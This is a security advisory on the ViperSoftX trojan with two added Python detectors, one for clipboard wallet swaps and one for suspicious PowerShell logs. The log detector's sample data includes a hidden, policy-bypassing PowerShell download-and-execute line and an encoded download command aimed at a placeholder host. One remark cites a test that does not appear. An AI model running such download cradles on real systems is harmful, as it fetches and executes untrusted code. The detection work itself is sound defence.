Advisory ID: ngCERT-2025-010004
Summary:
ngCERT is issuing an urgent security alert regarding the infiltration of ViperSoftX malware into Nigerian cyberspace. ViperSoftX is a JavaScript-based Remote Access Trojan (RAT) capable of stealing sensitive information such as banking and cryptocurrency details while evading detection and analysis on an infected system. Cybercriminals distribute this malware through infected email attachments, malicious online advertisements, social engineering, and cracked software. Once deployed on a system, the Trojan can be used for a range of malicious activities, leading to system compromise, data exfiltration, financial loss, identity theft, and ransomware attacks. ngCERT advises individuals and organizations to take immediate steps to protect their systems and data from ViperSoftX malware.
Damage/Probability: CRITICAL/HIGH
Platform(s): Operating Systems
Description:
A ViperSoftX infection begins when cybercriminals lure unsuspecting victims into downloading malicious files from multimedia sites, cracked-software download sites, eBooks, torrent sites, and malicious emails. Upon execution, ViperSoftX runs checks to detect virtual environments and security monitoring, identifies installed antivirus tools to gauge the risk of detection, and runs a PowerShell script to download its core malicious components. The Trojan then establishes two-way communication with its C2 servers to receive instructions and exfiltrate sensitive data. In summary, the attack chain consists of an infection and delivery stage, anti-analysis and security-evasion procedures, PowerShell script execution, and the installation of a rogue browser extension such as VenomSoftX, which targets cryptocurrency wallets and password managers. These steps aim to steal login credentials, cookies, and autofill data, enabling a sweeping breach of user accounts and sensitive data. Through clipboard hijacking, ViperSoftX also detects copied wallet addresses and replaces them with its own, diverting the victim's cryptocurrency transactions to the attacker. It further extracts password manager data, exposing the victim's entire security framework to further attacks.
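The clipboard-hijacking step described above has a simple defensive signature: a wallet address on the clipboard is replaced, within seconds, by a different address of the same coin type. The following is an added example, not part of the ngCERT advisory, of a detector for that pattern. It works over a series of clipboard snapshots so that it runs offline; the address patterns, the time window and the snapshots themselves are all assumptions, and a real deployment would feed it by sampling the OS clipboard on a timer.

```python
"""Added example (not part of the ngCERT advisory): detector for the
clipboard-hijacking behaviour in which a copied cryptocurrency address is
replaced, within a short window, by a different address of the same type.
Address patterns, window size and the sample snapshots are assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Simplified address shapes (assumed; production code would also verify checksums).
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"^(bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


@dataclass
class Snapshot:
    ts: float   # seconds since monitoring started
    text: str   # clipboard content observed at that time


@dataclass
class Alert:
    coin: str
    original: str
    replaced_with: str
    seconds_after: float


def classify_address(text: str) -> Optional[str]:
    """Return the coin type if text looks like a wallet address, else None."""
    t = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(t):
            return coin
    return None


def detect_swaps(snapshots: List[Snapshot], window_s: float = 5.0) -> List[Alert]:
    """Flag address -> different address transitions of the same coin type
    that happen within window_s seconds. A user re-copying a second address
    that quickly is unusual; a hijacker rewriting the clipboard is not."""
    alerts: List[Alert] = []
    prev: Optional[Snapshot] = None
    for snap in sorted(snapshots, key=lambda s: s.ts):
        if prev is not None:
            coin_prev = classify_address(prev.text)
            coin_now = classify_address(snap.text)
            if (coin_prev is not None and coin_prev == coin_now
                    and prev.text.strip() != snap.text.strip()
                    and snap.ts - prev.ts <= window_s):
                alerts.append(Alert(coin_now, prev.text.strip(),
                                    snap.text.strip(), snap.ts - prev.ts))
        prev = snap
    return alerts


# Constructed snapshots (obviously fake addresses): the BTC address is swapped
# 0.4 s after being copied; the ETH address is re-observed unchanged, then
# changes only long after the window has passed, so it is not flagged.
SAMPLE_SNAPSHOTS = [
    Snapshot(0.0, "meeting notes for Monday"),
    Snapshot(10.0, "1Victim" + "A" * 27),
    Snapshot(10.4, "1Attacker" + "B" * 25),
    Snapshot(30.0, "0x" + "a" * 40),
    Snapshot(31.0, "0x" + "a" * 40),
    Snapshot(60.0, "0x" + "b" * 40),
]

if __name__ == "__main__":
    for a in detect_swaps(SAMPLE_SNAPSHOTS):
        print(f"[{a.coin}] {a.original} -> {a.replaced_with} after {a.seconds_after:.1f}s")
```

The window is the tuning knob: a short one (a few seconds) catches a hijacker that rewrites the clipboard immediately while rarely flagging a user who legitimately copies two addresses in a row; widening it trades more coverage for more false positives, as the second assertion in the test shows.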
Consequences:
A successful ViperSoftX infection could lead to:
- System compromise
- Unauthorized access to sensitive data
- Loss and theft of sensitive data
- Reputational damage
- Ransomware attacks
- Financial loss
Solution:
ngCERT recommends the following:
- Refrain from opening attachments in unexpected emails, even from known senders, and in emails from unreliable sources.
- Ensure that the operating system, applications, antivirus, and plugins on all assets/systems are up to date.
- Conduct regular system scans and remove detected/potential threats.
- Maintain regular data backups on external devices or with reputable cloud storage providers.
- Consider implementing stronger security measures, including firewalls, intrusion detection/prevention systems, anti-phishing solutions, endpoint detection and response solutions, and anti-malware software.
- Implement comprehensive security solutions, such as BitLocker, FileVault, and/or device encryption, on all necessary devices.
- Enforce a strong password policy and implement regular password changes.
- Disable unused services and open ports on your agency's servers and endpoint devices. Only open ports and activate services that are necessary for daily operations.
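Several of the recommendations above (regular scans, intrusion detection, endpoint detection and response) come down to spotting the PowerShell stage the Description mentions, where the Trojan checks for antivirus tools and downloads its components. The following is an added example, not part of the ngCERT advisory, that triages PowerShell script-block log text (what Windows records in Event ID 4104 of the PowerShell operational log) for download cradles, hidden-window/bypass flags, antivirus enumeration and encoded commands. The indicator patterns, the scoring threshold and the sample log lines are all assumptions; the lines are constructed and use a placeholder .invalid host.

```python
"""Added example (not part of the ngCERT advisory): triage of PowerShell
script-block log text for behaviours described in the advisory (download
cradles, hidden/bypass flags, antivirus enumeration, encoded commands).
Indicator patterns, threshold and sample lines are assumptions."""
import base64
import re
from typing import Dict, List, Optional, Set

# Heuristic indicators (assumed): a tag plus a regex over the script text.
INDICATORS = [
    ("download_cradle", re.compile(
        r"(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer)")),
    ("hidden_or_bypass", re.compile(
        r"(?i)(-w(indowstyle)?\s+hidden|-ep\s+bypass|-ExecutionPolicy\s+Bypass|-nop\b)")),
    ("av_enumeration", re.compile(r"(?i)(AntiVirusProduct|SecurityCenter2)")),
    ("in_memory_exec", re.compile(r"(?i)(\bIEX\b|Invoke-Expression)")),
]
# -enc / -EncodedCommand followed by a base64 blob (UTF-16LE once decoded).
ENCODED_RE = re.compile(r"(?i)(?<!\w)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_line(text: str) -> Set[str]:
    """Tag one script-block line; an encoded payload is decoded and scanned too,
    so indicators hidden behind base64 still count."""
    tags = {tag for tag, rx in INDICATORS if rx.search(text)}
    decoded = decode_encoded_command(text)
    if decoded is not None:
        tags.add("encoded_command")
        tags |= {tag for tag, rx in INDICATORS if rx.search(decoded)}
    return tags


def triage(lines: List[str], threshold: int = 2) -> List[Dict]:
    """Return lines whose tag count meets the threshold, most suspicious first.
    A single tag (e.g. an admin listing AV products) is not enough on its own."""
    hits = []
    for i, line in enumerate(lines):
        tags = scan_line(line)
        if len(tags) >= threshold:
            hits.append({"index": i, "tags": sorted(tags), "text": line})
    return sorted(hits, key=lambda h: -len(h["tags"]))


# Constructed sample lines; hosts are placeholders, not real infrastructure.
_ENCODED = base64.b64encode(
    "Invoke-WebRequest http://placeholder.invalid/c -OutFile $env:TEMP\\c.ps1".encode("utf-16-le")
).decode("ascii")
SAMPLE_LOG_LINES = [
    r"Get-ChildItem C:\Users\alice\Documents | Measure-Object",
    "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2.ps1')\"",
    "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct",
    "powershell.exe -enc " + _ENCODED,
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG_LINES):
        print(f"line {hit['index']}: {', '.join(hit['tags'])}")
```

Two design points matter in practice: the encoded-command branch is what keeps a base64-wrapped download from scoring as a clean line, and the threshold stops a lone antivirus query, which administrators run legitimately, from paging anyone by itself.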
References:
- https://thehackernews.com/2023/04/vipersoftx-infostealer-adopts.html
- https://cujo.com/blog/vipersoftx-tracking-and-countering-a-persistent-threat/
- https://medium.com/@survivormansales/how-does-vipersoftx-work-75bbe179df23